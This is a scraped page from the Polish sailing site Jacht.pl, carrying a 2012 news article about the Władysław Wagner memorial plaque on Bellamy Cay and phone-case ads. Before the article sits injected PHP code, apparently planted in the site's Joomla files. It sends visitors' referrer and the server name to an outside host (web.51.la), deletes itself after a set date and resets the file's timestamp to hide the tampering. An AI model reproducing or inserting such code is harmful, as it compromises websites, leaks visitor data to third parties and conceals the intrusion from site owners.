check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Jacht.pl - Rejsy Morskie, Czartery Jachtów, Szkolenia Żeglarskie, Sklep Żeglarski - Tablica Pamięci Władysława Wagnera odsłonięta !

Czartery jachtów typu bareboat, czartery ze skiperem. Atrakcyjne upusty nawet do 20% , oferta last-minute i one-way sprawdź konkretny termin czarteru. Morze Śródziemne, Karaiby, Seszele, Tajlandia....

Polecamy !
  Oryginalne Etui 3D do telefonu
  bezpieczne zakupy na Allegro !
galerie przedmiotow na aukcje
Start Artykuły Aktualności Tablica Pamięci Władysława Wagnera odsłonięta !

Logo Wagner Sailing Rally 2012 Na maleńkiej wysepce Bellamy Cay w archipelagu Brytyjskich Wysp Dziewiczych została zainstalowana i uroczyście odsłonięta Tablica Pamiątkowa ku czci Władysława Wagnera. W latach międzywojennych opłynął on świat pod żaglami zapisując się w historii jako pierwszy Polak, który tego dokonał. Jego podróż trwała siedem lat. Mimo wielu przeciwności przeciął ponownie swój farwater na Atlantyku latem roku 1939. Triumfalny powrót do Gdyni został uniemożliwiony niemiecką inwazją na Polskę i wybuchem II Wojny Światowej. Jej geopolityczne konswekwencje i dożywotnie pozostanie Wagnera na emigracji spowodowało prawie kompletne wymazanie żeglarza i jego historycznego osiągnięcia ze społecznej pamięci Polaków. Koniec okresu PRL i odzyskanie niepodległości prawie nic w tej sprawie nie zmieniły.


O pamięć tą żeglarze postanowili się upomnieć. Rok 2012 został przez nich obwołany Rokiem Wagnera. Na ten właśnie rok wskazują trzy ważne i okrągłe rocznice. Stulecie urodzin, dwudziestolecie zgonu i osiemdziesięcio-lecie wyruszenia dziewiętnastoletniego Wagnera w rejs.

Powojenne dzieje Wagnera są dotychczas równie słabo znane jak przebieg wokółziemskiego rejsu. Pierwszym wydarzeniem Roku Wagnera to przypomnienie jego pionierskiego życia i zasług na Wyspach Dziewiczych.

Tablica Pamięci Władysława Wagnera
foto: Tablica Pamięci Władysława Wagnera na BVI.

Było to inicjowane i organizowane przez żeglarzy wywodzących się głównie ze środowisk emigracyjnych czyli polonijnych. Ich zaproszenie rozeszło się szeroko a frekwencja przekroczyła najśmielsze oczekiwania organizatorów. Już w piątek 20 stycznia w zatoce Trellis Bay zakotwiczyło ponad 30 jachtów prezentujących polskie kolory i narodowe symbole a niektórzy przybysze żeglowali do tego celu tysiące mil. Jacht regatowy HUSARIA startował z odległego o około 6000 Mm Vancouver - i dowiózł na miejsce wspomnianą tablicę. Podobny dystans ma za sobą katamaran SANTA MARIA, który przypłynął z Polski. Inny uczestnik z Polski to sts FRYDERYK CHOPIN. Reszta to dziesiątki jachtów z żeglarzami z Kanady, Stanów Zjednoczonych, Wielkiej Brytanii i innych kierunków. 

Uroczystość odsłonięcia tablicy miała miejsce, zgodnie z planem, w sobotę 21 stycznia 2012. Wyrażane szeroko zadowolenie i wysoka ocena słuszności idei ze strony jej uczestników z pewnością wpłynie pozytywnie na przygotowanie kolejnych wydarzeń Roku Wagnera w Polsce, gdzie pamięć o nim ucierpiała najmocniej.


Jerzy Knabe   21 stycznia 2012 r.
 

 
Znajdź nas na FaceBooku

  Kup w naszym sklepie na Allegro ! Wyróżnij się wśród innych swoim oryginalnym etui 3D na telefon !

   Zobacz nasze wzory: Batman, Stitch - Sticz, Star Wars - Lord Darth Vader, Minionek, Minionki, Myszka Minnie Miki,
   Disney Prosiaczek, Konik Pony - Jednorożec, Starbucks.

panel allegro
    Posiadamy bogatą ofertę Etui / Case do modeli telefonów:
   Apple: Apple iPhone 4/4S, Apple iPhone 5/4S/SE. Huawei: Huawei Y5 II, Huawei Y6 II, Huawei P8 Lite, Huawei P9 Lite.
   Samsung: Galaxy J3, Samsung Galaxy J310, Samsung Galaxy J5 (2016), Samsung Galaxy Grand Prime G530, Samsung Galaxy A5, Samsung Galaxy A5/E5.
   LG: LG G2 Mini, LG Leon 4G LTE C50, LG K8, LG K10.